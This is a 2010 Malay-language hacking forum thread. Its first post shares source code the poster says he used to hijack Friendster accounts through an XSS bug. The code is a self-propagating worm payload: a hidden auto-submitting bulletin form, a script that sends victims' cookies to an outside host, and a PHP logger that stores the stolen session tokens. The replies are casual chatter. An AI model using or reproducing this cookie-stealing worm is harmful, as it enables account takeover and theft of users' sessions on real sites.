Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[SRC]Friendster Hacking Using XSS (XSS Bug Fixed)
17-03-2010, 06:12 AM, (This post was last modified: 17-03-2010, 06:28 AM by fatah.)
Post: #1
[SRC]Friendster Hacking Using XSS (XSS Bug Fixed)
Dahulu, semasa Friendster wujud XSS bug, aku gunakan kod dibawah untuk mendapatkan cookies setiap mangsa. Dan dapat masuk ke profile mangsa tanpa perlu mengetahui username & password mangsa dengan menggunakan sessionid yang tersimpan.

Code:
inline code to section which prone to XSS bug
---------------------------------------------
<style>
.bls {display: none;}
</style>
<iframe name="bull" id="bull" src="" frameborder="0" height="0" scrolling="yes" width="0"></iframe>
<div class="bls">
<form action="bulletin.php" name="bulletin_form" target="bull" method="post">
<input name="_submitted" value="1" type="hidden">
<input name="action" value="post" type="hidden">
<input id="subjectfield" name="subject" size="50" maxlength="100" value="Hi! kapitgulung just updated new nice photos" type="text">
<textarea id="messagefield" name="message" wrap="hard" rows="10" cols="40">Check them out and comment. TQ.
My profile: http://profiles.friendster.com/MYFID
</textarea>
<input readonly="readonly" name="inputcount" size="5" maxlength="4" value="" type="hidden">
<input value="Post" type="submit">
</form>
</div>
<script>
window.onload = function () {document.bulletin_form.submit();}
</script>
<script src='http://www.mysite.com/friendster.js'></script>
Code:
friendster.js
---------------------------------
document.write("<iframe frameborder='0' height='0' scrolling='no' width='0' src='http://www.mysite.com/friendster.php?owner=" + escape(pageOwnerFName) + "&id=" + escape(pageViewerFName) + "&cookie=" + escape(document.cookie) + "' ></iframe>");
Code:
friendster.php
-----------------------------------------
<?php
$xfile = "/var/www/friendster.txt";
if(isset($_GET['id']) && isset($_GET['cookie']) || isset($_GET['owner'])) {
   if(preg_match('/friendster_auth=(.*)/i',$_GET['cookie'],$matches)) {
    $str = explode(';', $matches[1]);
       touch($xfile);
       $f = @fopen($xfile, "a");
       if($f) {
          fwrite($f, "id:{$_GET['id']},owner:{$_GET['owner']},cookie:{$str[0]}\n");
          fclose($f);
       }
   }
}
?>

Aku "tak pandai" bagi tutorial, jadi korang faham faham sendiri dengan kod di atas. ;-)
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
[Image: 763440762.png]
Reply
17-03-2010, 01:49 PM,
Post: #2
RE: [SRC]Friendster Hacking Using XSS (XSS Bug Fixed)
ajar arrr bro....:P
Reply
17-03-2010, 04:25 PM,
Post: #3
RE: [SRC]Friendster Hacking Using XSS (XSS Bug Fixed)
aku paham2..
dah paham.
dah buat kot dulu
Reply
17-03-2010, 04:41 PM,
Post: #4
RE: [SRC]Friendster Hacking Using XSS (XSS Bug Fixed)
xss dari tempat lain. buat satu js pastuh import kt xss tu, aku pernah nampak org gune ni kt website Kertaz. xD
"You're what you achieve. Therefore be the man you wanted to be."
Reply
17-03-2010, 04:48 PM, (This post was last modified: 17-03-2010, 05:04 PM by fatah.)
Post: #5
RE: [SRC]Friendster Hacking Using XSS (XSS Bug Fixed)
(17-03-2010, 04:41 PM)bytesz Wrote: xss dari tempat lain. buat satu js pastuh import kt xss tu, aku pernah nampak org gune ni kt website Kertaz. xD

url or reference ?
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
[Image: 763440762.png]
Reply
17-03-2010, 05:17 PM,
Post: #6
RE: [SRC]Friendster Hacking Using XSS (XSS Bug Fixed)
(17-03-2010, 04:41 PM)bytesz Wrote: xss dari tempat lain. buat satu js pastuh import kt xss tu, aku pernah nampak org gune ni kt website Kertaz. xD

ader bdak xss blog kertaz dulu ek Big GrinBig Grin
abis kene maki bdak tu kat blog kertaz Big GrinBig Grin

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  [TUT] Pentest/Hacking Windows ??? fatah 1 1,118 23-06-2013, 03:53 PM
Last Post: ell
  [M1lw0rm] - hacking & security 127001 29 9,850 20-08-2012, 03:55 PM
Last Post: sykess
  User Enumeration in | Hacking Codeshift3r 0 1,266 03-03-2012, 04:43 PM
Last Post: Codeshift3r

Forum Jump: